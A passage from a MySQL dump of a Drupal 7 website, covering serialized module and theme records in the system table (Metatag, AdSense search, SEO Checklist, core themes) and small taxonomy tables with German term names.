domains.\";s:12:\"dependencies\";a:1:{i:0;s:7:\"adsense\";}s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:36:\"admin/config/services/adsense/search\";s:5:\"files\";a:4:{i:0;s:24:\"adsense_search.admin.inc\";i:1;s:22:\"adsense_search.install\";i:2;s:21:\"adsense_search.module\";i:3;s:26:\"adsense_search.results.inc\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/metatag.module','metatag','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:7:\"Metatag\";s:11:\"description\";s:47:\"Adds support and an API to implement meta tags.\";s:7:\"package\";s:3:\"SEO\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:3:{i:0;s:15:\"system (>=7.28)\";i:1;s:6:\"ctools\";i:2;s:5:\"token\";}s:9:\"configure\";s:28:\"admin/config/search/metatags\";s:5:\"files\";a:3:{i:0;s:11:\"metatag.inc\";i:1;s:19:\"metatag.migrate.inc\";i:2;s:12:\"metatag.test\";}s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/metatag_context/metatag_context.module','metatag_context','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:16:\"Metatag: Context\";s:11:\"description\";s:100:\"Assigned Metatag using Context definitions, allowing them to be assigned by path and other criteria.\";s:7:\"package\";s:3:\"SEO\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:2:{i:0;s:7:\"context\";i:1;s:7:\"metatag\";}s:5:\"files\";a:1:{i:0;s:20:\"metatag_context.test\";}s:9:\"configure\";s:36:\"admin/config/search/metatags/context\";s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/metatag_dc/metatag_dc.module','metatag_dc','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:20:\"Metatag: Dublin Core\";s:11:\"description\";s:197:\"Provides the fifteen Dublin Core Metadata Element Set 1.1 meta tags from the Dublin Core Metadata Institute.\";s:7:\"package\";s:3:\"SEO\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:7:\"metatag\";}s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/metatag_devel/metatag_devel.module','metatag_devel','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:13:\"Metatag:Devel\";s:11:\"description\";s:102:\"Provides development / debugging functionality for the Metatag module. Integrates with Devel Generate.\";s:7:\"package\";s:11:\"Development\";s:4:\"core\";s:3:\"7.x\";s:4:\"tags\";a:1:{i:0;s:9:\"developer\";}s:12:\"dependencies\";a:1:{i:0;s:7:\"metatag\";}s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/metatag_facebook/metatag_facebook.module','metatag_facebook','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:17:\"Metatag: Facebook\";s:11:\"description\";s:49:\"Provides support for Facebook\'s custom meta tags.\";s:7:\"package\";s:3:\"SEO\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:7:\"metatag\";}s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/metatag_google_plus/metatag_google_plus.module','metatag_google_plus','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:16:\"Metatag: Google+\";s:11:\"description\";s:51:\"Provides support for Google+ \'itemscope\' meta tags.\";s:7:\"package\";s:3:\"SEO\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:7:\"metatag\";}s:5:\"files\";a:1:{i:0;s:23:\"metatag_google_plus.inc\";}s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/metatag_opengraph/metatag_opengraph.module','metatag_opengraph','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:17:\"Metatag:OpenGraph\";s:11:\"description\";s:51:\"Provides support for Open Graph Protocol meta tags.\";s:7:\"package\";s:3:\"SEO\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:7:\"metatag\";}s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/metatag_panels/metatag_panels.module','metatag_panels','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:15:\"Metatag: Panels\";s:11:\"description\";s:57:\"Provides Metatag integration within the Panels interface.\";s:7:\"package\";s:3:\"SEO\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:4:{i:0;s:6:\"ctools\";i:1;s:7:\"metatag\";i:2;s:6:\"panels\";i:3;s:5:\"token\";}s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/metatag_twitter_cards/metatag_twitter_cards.module','metatag_twitter_cards','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:22:\"Metatag: Twitter Cards\";s:11:\"description\";s:46:\"Provides support for Twitter\'s Card meta tags.\";s:7:\"package\";s:3:\"SEO\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:7:\"metatag\";}s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/metatag_views/metatag_views.module','metatag_views','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:14:\"Metatag: Views\";s:11:\"description\";s:56:\"Provides Metatag integration within the Views interface.\";s:7:\"package\";s:3:\"SEO\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:2:{i:0;s:7:\"metatag\";i:1;s:5:\"views\";}s:5:\"files\";a:1:{i:0;s:50:\"metatag_views_plugin_display_extender_metatags.inc\";}s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/metatag/tests/metatag_test.module','metatag_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:13:\"Meta Tag Test\";s:11:\"description\";s:33:\"Testing module for metatag.module\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:7:\"metatag\";}s:6:\"hidden\";b:1;s:7:\"version\";s:7:\"7.x-1.4\";s:7:\"project\";s:7:\"metatag\";s:9:\"datestamp\";s:10:\"1412909330\";s:5:\"mtime\";i:1434659475;s:7:\"package\";s:5:\"Other\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('sites/all/modules/seo_checklist/seo_checklist.module','seo_checklist','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:13:\"SEO Checklist\";s:11:\"description\";s:50:\"A Search Engine Optimization checklist for Drupal.\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:12:\"checklistapi\";}s:7:\"package\";s:3:\"SEO\";s:9:\"configure\";s:33:\"admin/config/search/seo-checklist\";s:7:\"version\";s:7:\"7.x-4.1\";s:7:\"project\";s:13:\"seo_checklist\";s:9:\"datestamp\";s:10:\"1360294437\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('sites/all/modules/twitter_block/twitter_block.module','twitter_block','module','',0,0,7201,0,'a:13:{s:4:\"name\";s:13:\"Twitter Block\";s:11:\"description\";s:48:\"Provides configurable blocks for a Twitter feed.\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:24:\"tests/twitter_block.test\";}s:9:\"configure\";s:21:\"admin/structure/block\";s:12:\"dependencies\";a:1:{i:0;s:5:\"block\";}s:7:\"version\";s:7:\"7.x-2.2\";s:7:\"project\";s:13:\"twitter_block\";s:9:\"datestamp\";s:10:\"1404893628\";s:5:\"mtime\";i:1439541243;s:7:\"package\";s:5:\"Other\";s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/themes/multipurpose/multipurpose.info','multipurpose','theme','themes/engines/phptemplate/phptemplate.engine',0,0,-1,0,'a:18:{s:4:\"name\";s:18:\"Multipurpose Theme\";s:11:\"description\";s:112:\"Multipurpose Theme is a premium Drupal 7 theme. Developed by Devsaran.com.\";s:4:\"core\";s:3:\"7.x\";s:6:\"engine\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:2:{s:9:\"style.css\";s:39:\"sites/all/themes/multipurpose/style.css\";s:18:\"css/responsive.css\";s:48:\"sites/all/themes/multipurpose/css/responsive.css\";}}s:7:\"scripts\";a:3:{s:12:\"js/retina.js\";s:42:\"sites/all/themes/multipurpose/js/retina.js\";s:13:\"js/plugins.js\";s:43:\"sites/all/themes/multipurpose/js/plugins.js\";s:12:\"js/global.js\";s:42:\"sites/all/themes/multipurpose/js/global.js\";}s:7:\"regions\";a:15:{s:13:\"sidebar_first\";s:13:\"First Sidebar\";s:6:\"header\";s:6:\"Header\";s:13:\"preface_first\";s:13:\"Preface First\";s:14:\"preface_middle\";s:14:\"Preface Middle\";s:12:\"preface_last\";s:12:\"Preface Last\";s:11:\"content_top\";s:11:\"Content Top\";s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:6:\"footer\";s:6:\"Footer\";s:12:\"footer_first\";s:12:\"First Bottom\";s:13:\"footer_second\";s:13:\"Second Bottom\";s:12:\"footer_third\";s:12:\"Third Bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:4:\"name\";i:2;s:6:\"slogan\";i:3;s:17:\"node_user_picture\";i:4;s:20:\"comment_user_picture\";i:5;s:25:\"comment_user_verification\";i:6;s:7:\"favicon\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:8:\"settings\";a:8:{s:17:\"slideshow_display\";s:1:\"1\";s:11:\"breadcrumbs\";s:1:\"1\";s:10:\"image_logo\";s:1:\"0\";s:18:\"socialicon_display\";s:1:\"1\";s:12:\"facebook_url\";s:39:\"http://www.facebook.com/devsaran.drupal\";s:11:\"twitter_url\";s:34:\"http://www.twitter.com/saranquardz\";s:15:\"google_plus_url\";s:49:\"https://plus.google.com/u/0/109064032428497406718\";s:13:\"pinterest_url\";s:20:\"http://pinterest.com\";}s:7:\"version\";s:7:\"7.x-1.0\";s:7:\"project\";s:12:\"multipurpose\";s:9:\"datestamp\";s:10:\"1409600329\";s:10:\"screenshot\";s:44:\"sites/all/themes/multipurpose/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}'),('sites/all/themes/responsive_bartik/responsive_bartik.info','responsive_bartik','theme','themes/engines/phptemplate/phptemplate.engine',1,0,-1,0,'a:18:{s:4:\"name\";s:17:\"Responsive Bartik\";s:11:\"description\";s:86:\"A flexible, recolorable theme with many regions and a responsive, mobile-first layout.\";s:7:\"version\";s:7:\"7.x-1.0\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:49:\"sites/all/themes/responsive_bartik/css/layout.css\";s:13:\"css/style.css\";s:48:\"sites/all/themes/responsive_bartik/css/style.css\";s:14:\"css/colors.css\";s:49:\"sites/all/themes/responsive_bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:48:\"sites/all/themes/responsive_bartik/css/print.css\";}}s:7:\"scripts\";a:1:{s:22:\"js/collapsible-menu.js\";s:57:\"sites/all/themes/responsive_bartik/js/collapsible-menu.js\";}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:17:\"responsive_bartik\";s:9:\"datestamp\";s:10:\"1413392482\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:49:\"sites/all/themes/responsive_bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}'),('themes/bartik/bartik.info','bartik','theme','themes/engines/phptemplate/phptemplate.engine',1,0,-1,0,'a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1445457729;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}'),('themes/garland/garland.info','garland','theme','themes/engines/phptemplate/phptemplate.engine',0,0,-1,0,'a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1445457729;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}'),('themes/seven/seven.info','seven','theme','themes/engines/phptemplate/phptemplate.engine',1,0,-1,0,'a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1445457729;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}'),('themes/stark/stark.info','stark','theme','themes/engines/phptemplate/phptemplate.engine',0,0,-1,0,'a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1445457729;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}'); /*!40000 ALTER TABLE `system` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `taxonomy_index` -- DROP TABLE IF EXISTS `taxonomy_index`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `taxonomy_index` ( `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The node.nid this record tracks.', `tid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The term ID.', `sticky` tinyint(4) DEFAULT '0' COMMENT 'Boolean indicating whether the node is sticky.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when the node was created.', KEY `term_node` (`tid`,`sticky`,`created`), KEY `nid` (`nid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maintains denormalized information about node/term...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `taxonomy_index` -- LOCK TABLES `taxonomy_index` WRITE; /*!40000 ALTER TABLE `taxonomy_index` DISABLE KEYS */; INSERT INTO `taxonomy_index` VALUES (6,1,0,1428671410),(6,2,0,1428671410),(4,3,0,1426851954); /*!40000 ALTER TABLE `taxonomy_index` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `taxonomy_term_data` -- DROP TABLE IF EXISTS `taxonomy_term_data`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `taxonomy_term_data` ( `tid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique term ID.', `vid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The taxonomy_vocabulary.vid of the vocabulary to which the term is assigned.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The term name.', `description` longtext COMMENT 'A description of the term.', `format` varchar(255) DEFAULT NULL COMMENT 'The filter_format.format of the description.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The weight of this term in relation to other terms.', PRIMARY KEY (`tid`), KEY `taxonomy_tree` (`vid`,`weight`,`name`), KEY `vid_name` (`vid`,`name`), KEY `name` (`name`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='Stores term information.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `taxonomy_term_data` -- LOCK TABLES `taxonomy_term_data` WRITE; /*!40000 ALTER TABLE `taxonomy_term_data` DISABLE KEYS */; INSERT INTO `taxonomy_term_data` VALUES (1,1,'Anträge',NULL,NULL,0),(2,1,'talrat',NULL,NULL,0),(3,1,'Termine',NULL,NULL,0); /*!40000 ALTER TABLE `taxonomy_term_data` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `taxonomy_term_hierarchy` -- DROP TABLE IF EXISTS `taxonomy_term_hierarchy`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `taxonomy_term_hierarchy` ( `tid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Primary Key: The taxonomy_term_data.tid of the term.', `parent` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Primary Key: The taxonomy_term_data.tid of the term’s parent. 0 indicates no parent.', PRIMARY KEY (`tid`,`parent`), KEY `parent` (`parent`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores the hierarchical relationship between terms.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `taxonomy_term_hierarchy` -- LOCK TABLES `taxonomy_term_hierarchy` WRITE; /*!40000 ALTER TABLE `taxonomy_term_hierarchy` DISABLE KEYS */; INSERT INTO `taxonomy_term_hierarchy` VALUES (1,0),(2,0),(3,0); /*!40000 ALTER TABLE `taxonomy_term_hierarchy` ENABLE KEYS */; UNLOCK 